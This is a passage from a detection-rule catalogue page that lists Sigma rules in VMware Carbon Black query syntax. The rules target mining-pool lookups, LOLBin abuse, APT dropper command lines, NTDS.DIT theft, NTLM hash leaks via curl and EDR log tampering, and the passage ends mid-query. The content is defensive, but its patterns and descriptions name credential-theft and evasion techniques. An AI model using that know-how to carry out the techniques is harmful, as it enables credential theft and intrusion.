Home/Detection rules/VMware Carbon Black
Tool
EDR / XDR

VMware Carbon Black

3,646 rules · Sigma detections in VMware Carbon Black syntax
The same Sigma detection corpus, machine-rendered into VMware Carbon Black query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 3,646 rules (.zip, 1.2 MB) Every VMware Carbon Black query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance12
Resource Development10
Initial Access10
Execution30
Persistence42
Privilege Escalation20
Stealth79
Defense Impairment32
Credential Access35
Discovery33
Lateral Movement16
Collection20
Command and Control24
Exfiltration10
Impact18
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.

Detection rules

50 shown of 3,646
high Moderate High FP
Monero Crypto Coin Mining Pool Lookup
Detects suspicious DNS queries to Monero mining pools
status stable author Florian Roth (Nextron Systems) ATT&CK technique id b593fd50-7335-4682-a36c-4edcb68e4641
carbon_black query
query:pool.minexmr.com* OR query:fr.minexmr.com* OR query:de.minexmr.com* OR query:sg.minexmr.com* OR query:ca.minexmr.com* OR query:us\-west.minexmr.com* OR query:pool.supportxmr.com* OR query:mine.c3pool.com* OR query:xmr\-eu1.nanopool.org* OR query:xmr\-eu2.nanopool.org* OR query:xmr\-us\-east1.nanopool.org* OR query:xmr\-us\-west1.nanopool.org* OR query:xmr\-asia1.nanopool.org* OR query:xmr\-jp1.nanopool.org* OR query:xmr\-au1.nanopool.org* OR query:xmr.2miners.com* OR query:xmr.hashcity.org* OR query:xmr.f2pool.com* OR query:xmrpool.eu* OR query:pool.hashvault.pro*
view Sigma YAML
title: Monero Crypto Coin Mining Pool Lookup
id: b593fd50-7335-4682-a36c-4edcb68e4641
status: stable
description: Detects suspicious DNS queries to Monero mining pools
references:
    - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/
author: Florian Roth (Nextron Systems)
date: 2021-10-24
tags:
    - attack.impact
    - attack.t1496
    - attack.exfiltration
    - attack.t1567
logsource:
    category: dns
detection:
    selection:
        query|contains:
            - 'pool.minexmr.com'
            - 'fr.minexmr.com'
            - 'de.minexmr.com'
            - 'sg.minexmr.com'
            - 'ca.minexmr.com'
            - 'us-west.minexmr.com'
            - 'pool.supportxmr.com'
            - 'mine.c3pool.com'
            - 'xmr-eu1.nanopool.org'
            - 'xmr-eu2.nanopool.org'
            - 'xmr-us-east1.nanopool.org'
            - 'xmr-us-west1.nanopool.org'
            - 'xmr-asia1.nanopool.org'
            - 'xmr-jp1.nanopool.org'
            - 'xmr-au1.nanopool.org'
            - 'xmr.2miners.com'
            - 'xmr.hashcity.org'
            - 'xmr.f2pool.com'
            - 'xmrpool.eu'
            - 'pool.hashvault.pro'
    condition: selection
falsepositives:
    - Legitimate crypto coin mining
level: high
Convert to SIEM query
high Moderate High FP
MpiExec Lolbin
Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
status test author Florian Roth (Nextron Systems) ATT&CK technique id 729ce0ea-5d8f-4769-9762-e35de441586d
carbon_black query
(Image:\\mpiexec.exe OR Hashes:IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217*) (CommandLine:\ \/n\ 1\ * OR CommandLine:\ \-n\ 1\ *)
view Sigma YAML
title: MpiExec Lolbin
id: 729ce0ea-5d8f-4769-9762-e35de441586d
status: test
description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
references:
    - https://twitter.com/mrd0x/status/1465058133303246867
    - https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps
author: Florian Roth (Nextron Systems)
date: 2022-01-11
modified: 2024-11-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_binary:
        - Image|endswith: '\mpiexec.exe'
        - Hashes|contains: 'IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217'
    selection_flags:
        CommandLine|contains:
            - ' /n 1 '
            - ' -n 1 '
    condition: all of selection*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Mshtml.DLL RunHTMLApplication Suspicious Usage
Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
status test author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) ATT&CK tactic-only id 4782eb5a-a513-4523-a0ac-f3082b26ac5c
carbon_black query
(CommandLine:\\..\\* CommandLine:mshtml*) (CommandLine:#135* OR CommandLine:RunHTMLApplication*)
view Sigma YAML
title: Mshtml.DLL RunHTMLApplication Suspicious Usage
id: 4782eb5a-a513-4523-a0ac-f3082b26ac5c
related:
    - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3
      type: obsolete
    - id: 73fcad2e-ff14-4c38-b11d-4172c8ac86c7
      type: obsolete
status: test
description: |
    Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
references:
    - https://twitter.com/n1nj4sec/status/1421190238081277959
    - https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
    - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
author: Nasreddine Bencherchali (Nextron Systems),  Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
date: 2022-08-14
modified: 2024-02-23
tags:
    - attack.execution
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\..\'
            - 'mshtml'
        CommandLine|contains:
            - '#135'
            - 'RunHTMLApplication'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate High FP
Mstsc.EXE Execution From Uncommon Parent
Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6
carbon_black query
(ParentImage:\\brave.exe OR ParentImage:\\CCleanerBrowser.exe OR ParentImage:\\chrome.exe OR ParentImage:\\chromium.exe OR ParentImage:\\firefox.exe OR ParentImage:\\iexplore.exe OR ParentImage:\\microsoftedge.exe OR ParentImage:\\msedge.exe OR ParentImage:\\opera.exe OR ParentImage:\\vivaldi.exe OR ParentImage:\\whale.exe OR ParentImage:\\outlook.exe) (Image:\\mstsc.exe OR OriginalFileName:mstsc.exe)
view Sigma YAML
title: Mstsc.EXE Execution From Uncommon Parent
id: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6
status: test
description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
references:
    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/
    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-18
tags:
    - attack.lateral-movement
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            # Covers potential downloads/clicks from browsers
            - '\brave.exe'
            - '\CCleanerBrowser.exe'
            - '\chrome.exe'
            - '\chromium.exe'
            - '\firefox.exe'
            - '\iexplore.exe'
            - '\microsoftedge.exe'
            - '\msedge.exe'
            - '\opera.exe'
            - '\vivaldi.exe'
            - '\whale.exe'
            # Covers potential downloads/clicks from email clients
            - '\outlook.exe'
    selection_img:
        - Image|endswith: '\mstsc.exe'
        - OriginalFileName: 'mstsc.exe'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate High FP
Mustang Panda Dropper
Detects specific process parameters as used by Mustang Panda droppers
status test author Florian Roth (Nextron Systems), oscd.community ATT&CK sub-technique id 2d87d610-d760-45ee-a7e6-7a6f2a65de00
carbon_black query
((CommandLine:Temp\\wtask.exe\ \/create* OR CommandLine:%windir\:\~\-3,1%%PUBLIC\:\~\-9,1%* OR CommandLine:\/tn\ \"Security\ Script\ * OR CommandLine:%windir\:\~\-1,1%*) OR (CommandLine:\/E\:vbscript* CommandLine:C\:\\Users\\* CommandLine:.txt* CommandLine:\/F*)) OR Image:Temp\\winwsh.exe
view Sigma YAML
title: Mustang Panda Dropper
id: 2d87d610-d760-45ee-a7e6-7a6f2a65de00
status: test
description: Detects specific process parameters as used by Mustang Panda droppers
references:
    - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/
    - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/
    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
author: Florian Roth (Nextron Systems), oscd.community
date: 2019-10-30
modified: 2021-11-27
tags:
    - attack.t1587.001
    - attack.resource-development
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli:
        - CommandLine|contains:
              - 'Temp\wtask.exe /create'
              - '%windir:~-3,1%%PUBLIC:~-9,1%'
              - '/tn "Security Script '
              - '%windir:~-1,1%'
        - CommandLine|contains|all:
              - '/E:vbscript'
              - 'C:\Users\'
              - '.txt'
              - '/F'
    selection_img:
        Image|endswith: 'Temp\winwsh.exe'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate High FP
NET NGenAssemblyUsageLog Registry Key Tamper
Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
status test author frack113 ATT&CK technique id 28036918-04d3-423d-91c0-55ecf99fb892
carbon_black query
TargetObject:SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog
view Sigma YAML
title: NET NGenAssemblyUsageLog Registry Key Tamper
id: 28036918-04d3-423d-91c0-55ecf99fb892
status: test
description: |
  Detects changes to the NGenAssemblyUsageLog registry key.
  .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
  By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
references:
    - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/
author: frack113
date: 2022-11-18
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: 'SOFTWARE\Microsoft\.NETFramework\NGenAssemblyUsageLog'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
NTDS Exfiltration Filename Patterns
Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 3a8da4e0-36c1-40d2-8b29-b3e890d5172a
carbon_black query
TargetFilename:\\All.cab OR TargetFilename:.ntds.cleartext
view Sigma YAML
title: NTDS Exfiltration Filename Patterns
id: 3a8da4e0-36c1-40d2-8b29-b3e890d5172a
status: test
description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
references:
    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb
    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1
    - https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405
author: Florian Roth (Nextron Systems)
date: 2022-03-11
modified: 2023-05-05
tags:
    - attack.credential-access
    - attack.t1003.003
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\All.cab' # https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1
            - '.ntds.cleartext' # https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Medium FP
NTDS.DIT Creation By Uncommon Parent Process
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 4e7050dd-e548-483f-b7d6-527ab4fa784d
carbon_black query
TargetFilename:\\ntds.dit ((ParentImage:\\cscript.exe OR ParentImage:\\httpd.exe OR ParentImage:\\nginx.exe OR ParentImage:\\php\-cgi.exe OR ParentImage:\\powershell.exe OR ParentImage:\\pwsh.exe OR ParentImage:\\w3wp.exe OR ParentImage:\\wscript.exe) OR (ParentImage:\\apache* OR ParentImage:\\tomcat* OR ParentImage:\\AppData\\* OR ParentImage:\\Temp\\* OR ParentImage:\\Public\\* OR ParentImage:\\PerfLogs\\*))
view Sigma YAML
title: NTDS.DIT Creation By Uncommon Parent Process
id: 4e7050dd-e548-483f-b7d6-527ab4fa784d
related:
    - id: 11b1ed55-154d-4e82-8ad7-83739298f720
      type: similar
status: test
description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
references:
    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/
    - https://pentestlab.blog/tag/ntds-dit/
    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1
author: Florian Roth (Nextron Systems)
date: 2022-03-11
modified: 2023-01-05
tags:
    - attack.credential-access
    - attack.t1003.003
logsource:
    product: windows
    category: file_event
    definition: 'Requirements: The "ParentImage" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data'
detection:
    selection_file:
        TargetFilename|endswith: '\ntds.dit'
    selection_process_parent:
        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11
        ParentImage|endswith:
            - '\cscript.exe'
            - '\httpd.exe'
            - '\nginx.exe'
            - '\php-cgi.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\w3wp.exe'
            - '\wscript.exe'
    selection_process_parent_path:
        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11
        ParentImage|contains:
            - '\apache'
            - '\tomcat'
            - '\AppData\'
            - '\Temp\'
            - '\Public\'
            - '\PerfLogs\'
    condition: selection_file and 1 of selection_process_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
NTDS.DIT Creation By Uncommon Process
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
status test author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 11b1ed55-154d-4e82-8ad7-83739298f720
carbon_black query
TargetFilename:\\ntds.dit ((Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe OR Image:\\wsl.exe OR Image:\\wt.exe) OR (Image:\\AppData\\* OR Image:\\Temp\\* OR Image:\\Public\\* OR Image:\\PerfLogs\\*))
view Sigma YAML
title: NTDS.DIT Creation By Uncommon Process
id: 11b1ed55-154d-4e82-8ad7-83739298f720
related:
    - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d
      type: similar
status: test
description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
references:
    - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/
    - https://adsecurity.org/?p=2398
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-01-11
modified: 2022-07-14
tags:
    - attack.credential-access
    - attack.t1003.002
    - attack.t1003.003
logsource:
    product: windows
    category: file_event
detection:
    selection_ntds:
        TargetFilename|endswith: '\ntds.dit'
    selection_process_img:
        Image|endswith:
            # Add more suspicious processes as you see fit
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\wscript.exe'
            - '\wsl.exe'
            - '\wt.exe'
    selection_process_paths:
        Image|contains:
            - '\AppData\'
            - '\Temp\'
            - '\Public\'
            - '\PerfLogs\'
    condition: selection_ntds and 1 of selection_process_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
NTFS Alternate Data Stream
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
status test author Sami Ruohonen ATT&CK sub-technique id 8c521530-5169-495d-a199-0a3a881ad24e
carbon_black query
(ScriptBlockText:set\-content* OR ScriptBlockText:add\-content*) ScriptBlockText:\-stream*
view Sigma YAML
title: NTFS Alternate Data Stream
id: 8c521530-5169-495d-a199-0a3a881ad24e
status: test
description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
references:
    - https://web.archive.org/web/20220614030603/http://www.powertheshell.com/ntfsstreams/
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
author: Sami Ruohonen
date: 2018-07-24
modified: 2022-12-25
tags:
    - attack.stealth
    - attack.t1564.004
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_content:
        ScriptBlockText|contains:
            - set-content
            - add-content
    selection_stream:
        ScriptBlockText|contains: '-stream'
    condition: all of selection*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Low FP
NTFS Vulnerability Exploitation
This the exploitation of a NTFS vulnerability as reported without many details via Twitter
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id f14719ce-d3ab-4e25-9ce6-2899092260b0
carbon_black query
Provider_Name:Ntfs EventID:55 Origin:File\ System\ Driver (Description:contains\ a\ corrupted\ file\ record* Description:The\ name\ of\ the\ file\ is\ \"\\\"*)
view Sigma YAML
title: NTFS Vulnerability Exploitation
id: f14719ce-d3ab-4e25-9ce6-2899092260b0
status: test
description: This the exploitation of a NTFS vulnerability as reported without many details via Twitter
references:
    - https://twitter.com/jonasLyk/status/1347900440000811010
    - https://twitter.com/wdormann/status/1347958161609809921
    - https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/
author: Florian Roth (Nextron Systems)
date: 2021-01-11
modified: 2022-12-25
tags:
    - attack.impact
    - attack.t1499.001
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: Ntfs
        EventID: 55
        Origin: 'File System Driver'
        Description|contains|all:
            - 'contains a corrupted file record'
            - 'The name of the file is "\"'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Strong Medium FP
NTLM Hash Leak Via Curl NTLM Authentication
Detects the use of curl with NTLM authentication and empty credentials (-u :), which can be abused to leak the currently logged-in user's NTLMv2 challenge-response to an attacker-controlled server, enabling offline cracking or relay attacks. When no credentials are provided, the Microsoft-shipped curl passes a NULL identity to Windows SSPI, which automatically falls back to the current user's logon session credentials stored in LSASS — without requiring a plaintext password. This behavior is exclusive to the curl binary shipped by Microsoft (available since Windows 10 / Windows Server 2019), which is built with SSPI support.
status test author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK technique id 916eb839-895e-47f8-99ee-3008bf377a3e
carbon_black query
(Image:\\curl.exe OR OriginalFileName:curl.exe) CommandLine:\-\-ntlm* CommandLine:(?i)\\s(-u|--user)\\s*:
view Sigma YAML
title: NTLM Hash Leak Via Curl NTLM Authentication
id: 916eb839-895e-47f8-99ee-3008bf377a3e
status: test
description: |
    Detects the use of curl with NTLM authentication and empty credentials (-u :), which can be abused to leak the currently logged-in user's NTLMv2 challenge-response to an
    attacker-controlled server, enabling offline cracking or relay attacks.
    When no credentials are provided, the Microsoft-shipped curl passes a NULL identity to Windows SSPI, which automatically falls back to the current user's logon session credentials
    stored in LSASS — without requiring a plaintext password.
    This behavior is exclusive to the curl binary shipped by Microsoft (available since Windows 10 / Windows Server 2019), which is built with SSPI support.
references:
    - https://github.com/curl/curl/blob/master/lib/vauth/ntlm_sspi.c#L128-L140
    - https://learn.microsoft.com/en-us/windows/win32/secauthn/acquirecredentialshandle--ntlm
    - https://curl.se/docs/manpage.html#--ntlm
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-06-04
tags:
    - attack.credential-access
    - attack.t1187
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\curl.exe'
        - OriginalFileName: 'curl.exe'
    selection_ntlm_flag:
        CommandLine|contains: '--ntlm'
    selection_empty_creds:
        CommandLine|re: '(?i)\s(-u|--user)\s*:'
    condition: all of selection_*
falsepositives:
    - Should be very rare as it's not widely known or used, but could occur in legitimate use cases where curl is used with NTLM authentication and empty credentials, such as in certain scripts or automation tasks.
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_curl_ntlm_hash_leak_attempt/info.yml
Convert to SIEM query
high Moderate Medium FP
Narrator's Feedback-Hub Persistence
Detects abusing Windows 10 Narrator's Feedback-Hub
status test author Dmitriy Lifanov, oscd.community ATT&CK sub-technique id f663a6d9-9d1b-49b8-b2b1-0637914d199a
carbon_black query
(EventType:DeleteValue TargetObject:\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute) OR TargetObject:\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\\(Default\)
view Sigma YAML
title: Narrator's Feedback-Hub Persistence
id: f663a6d9-9d1b-49b8-b2b1-0637914d199a
status: test
description: Detects abusing Windows 10 Narrator's Feedback-Hub
references:
    - https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2022-03-26
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: registry_event
    product: windows
detection:
    selection1:
        EventType: DeleteValue
        TargetObject|endswith: '\AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\DelegateExecute'
    selection2:
        TargetObject|endswith: '\AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\(Default)'
    # Add the payload in the (Default)
    condition: 1 of selection*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Net WebClient Casing Anomalies
Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id c86133ad-4725-4bd0-8170-210788e0a7ba
carbon_black query
((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) (CommandLine:TgBlAFQALgB3AEUAQg* OR CommandLine:4AZQBUAC4AdwBFAEIA* OR CommandLine:OAGUAVAAuAHcARQBCA* OR CommandLine:bgBFAHQALgB3AGUAYg* OR CommandLine:4ARQB0AC4AdwBlAGIA* OR CommandLine:uAEUAdAAuAHcAZQBiA* OR CommandLine:TgBFAHQALgB3AGUAYg* OR CommandLine:OAEUAdAAuAHcAZQBiA* OR CommandLine:bgBlAFQALgB3AGUAYg* OR CommandLine:4AZQBUAC4AdwBlAGIA* OR CommandLine:uAGUAVAAuAHcAZQBiA* OR CommandLine:TgBlAFQALgB3AGUAYg* OR CommandLine:OAGUAVAAuAHcAZQBiA* OR CommandLine:bgBFAFQALgB3AGUAYg* OR CommandLine:4ARQBUAC4AdwBlAGIA* OR CommandLine:uAEUAVAAuAHcAZQBiA* OR CommandLine:bgBlAHQALgBXAGUAYg* OR CommandLine:4AZQB0AC4AVwBlAGIA* OR CommandLine:uAGUAdAAuAFcAZQBiA* OR CommandLine:bgBFAHQALgBXAGUAYg* OR CommandLine:4ARQB0AC4AVwBlAGIA* OR CommandLine:uAEUAdAAuAFcAZQBiA* OR CommandLine:TgBFAHQALgBXAGUAYg* OR CommandLine:OAEUAdAAuAFcAZQBiA* OR CommandLine:bgBlAFQALgBXAGUAYg* OR CommandLine:4AZQBUAC4AVwBlAGIA* OR CommandLine:uAGUAVAAuAFcAZQBiA* OR CommandLine:TgBlAFQALgBXAGUAYg* OR CommandLine:OAGUAVAAuAFcAZQBiA* OR CommandLine:bgBFAFQALgBXAGUAYg* OR CommandLine:4ARQBUAC4AVwBlAGIA* OR CommandLine:uAEUAVAAuAFcAZQBiA* OR CommandLine:bgBlAHQALgB3AEUAYg* OR CommandLine:4AZQB0AC4AdwBFAGIA* OR CommandLine:uAGUAdAAuAHcARQBiA* OR CommandLine:TgBlAHQALgB3AEUAYg* OR CommandLine:OAGUAdAAuAHcARQBiA* OR CommandLine:bgBFAHQALgB3AEUAYg* OR CommandLine:4ARQB0AC4AdwBFAGIA* OR CommandLine:uAEUAdAAuAHcARQBiA* OR CommandLine:TgBFAHQALgB3AEUAYg* OR CommandLine:OAEUAdAAuAHcARQBiA* OR CommandLine:bgBlAFQALgB3AEUAYg* OR CommandLine:4AZQBUAC4AdwBFAGIA* OR CommandLine:uAGUAVAAuAHcARQBiA* OR CommandLine:TgBlAFQALgB3AEUAYg* OR CommandLine:OAGUAVAAuAHcARQBiA* OR CommandLine:bgBFAFQALgB3AEUAYg* OR CommandLine:4ARQBUAC4AdwBFAGIA* OR CommandLine:uAEUAVAAuAHcARQBiA* OR CommandLine:TgBFAFQALgB3AEUAYg* OR CommandLine:OAEUAVAAuAHcARQBiA* OR CommandLine:bgBlAHQALgBXAEUAYg* OR CommandLine:4AZQB0AC4AVwBFAGIA* OR CommandLine:uAGUAdAAuAFcARQBiA* OR CommandLine:TgBlAHQALgBXAEUAYg* OR CommandLine:OAGUAdAAuAFcARQBiA* OR CommandLine:bgBFAHQALgBXAEUAYg* OR CommandLine:4ARQB0AC4AVwBFAGIA* OR CommandLine:uAEUAdAAuAFcARQBiA* OR CommandLine:TgBFAHQALgBXAEUAYg* OR CommandLine:OAEUAdAAuAFcARQBiA* OR CommandLine:bgBlAFQALgBXAEUAYg* OR CommandLine:4AZQBUAC4AVwBFAGIA* OR CommandLine:uAGUAVAAuAFcARQBiA* OR CommandLine:TgBlAFQALgBXAEUAYg* OR CommandLine:OAGUAVAAuAFcARQBiA* OR CommandLine:bgBFAFQALgBXAEUAYg* OR CommandLine:4ARQBUAC4AVwBFAGIA* OR CommandLine:uAEUAVAAuAFcARQBiA* OR CommandLine:TgBFAFQALgBXAEUAYg* OR CommandLine:OAEUAVAAuAFcARQBiA* OR CommandLine:bgBlAHQALgB3AGUAQg* OR CommandLine:4AZQB0AC4AdwBlAEIA* OR CommandLine:uAGUAdAAuAHcAZQBCA* OR CommandLine:TgBlAHQALgB3AGUAQg* OR CommandLine:OAGUAdAAuAHcAZQBCA* OR CommandLine:bgBFAHQALgB3AGUAQg* OR CommandLine:4ARQB0AC4AdwBlAEIA* OR CommandLine:uAEUAdAAuAHcAZQBCA* OR CommandLine:TgBFAHQALgB3AGUAQg* OR CommandLine:OAEUAdAAuAHcAZQBCA* OR CommandLine:bgBlAFQALgB3AGUAQg* OR CommandLine:4AZQBUAC4AdwBlAEIA* OR CommandLine:uAGUAVAAuAHcAZQBCA* OR CommandLine:TgBlAFQALgB3AGUAQg* OR CommandLine:OAGUAVAAuAHcAZQBCA* OR CommandLine:bgBFAFQALgB3AGUAQg* OR CommandLine:4ARQBUAC4AdwBlAEIA* OR CommandLine:uAEUAVAAuAHcAZQBCA* OR CommandLine:TgBFAFQALgB3AGUAQg* OR CommandLine:OAEUAVAAuAHcAZQBCA* OR CommandLine:bgBlAHQALgBXAGUAQg* OR CommandLine:4AZQB0AC4AVwBlAEIA* OR CommandLine:uAGUAdAAuAFcAZQBCA* OR CommandLine:TgBlAHQALgBXAGUAQg* OR CommandLine:OAGUAdAAuAFcAZQBCA* OR CommandLine:bgBFAHQALgBXAGUAQg* OR CommandLine:4ARQB0AC4AVwBlAEIA* OR CommandLine:uAEUAdAAuAFcAZQBCA* OR CommandLine:TgBFAHQALgBXAGUAQg* OR CommandLine:OAEUAdAAuAFcAZQBCA* OR CommandLine:bgBlAFQALgBXAGUAQg* OR CommandLine:4AZQBUAC4AVwBlAEIA* OR CommandLine:uAGUAVAAuAFcAZQBCA* OR CommandLine:TgBlAFQALgBXAGUAQg* OR CommandLine:OAGUAVAAuAFcAZQBCA* OR CommandLine:bgBFAFQALgBXAGUAQg* OR CommandLine:4ARQBUAC4AVwBlAEIA* OR CommandLine:uAEUAVAAuAFcAZQBCA* OR CommandLine:TgBFAFQALgBXAGUAQg* OR CommandLine:OAEUAVAAuAFcAZQBCA* OR CommandLine:bgBlAHQALgB3AEUAQg* OR 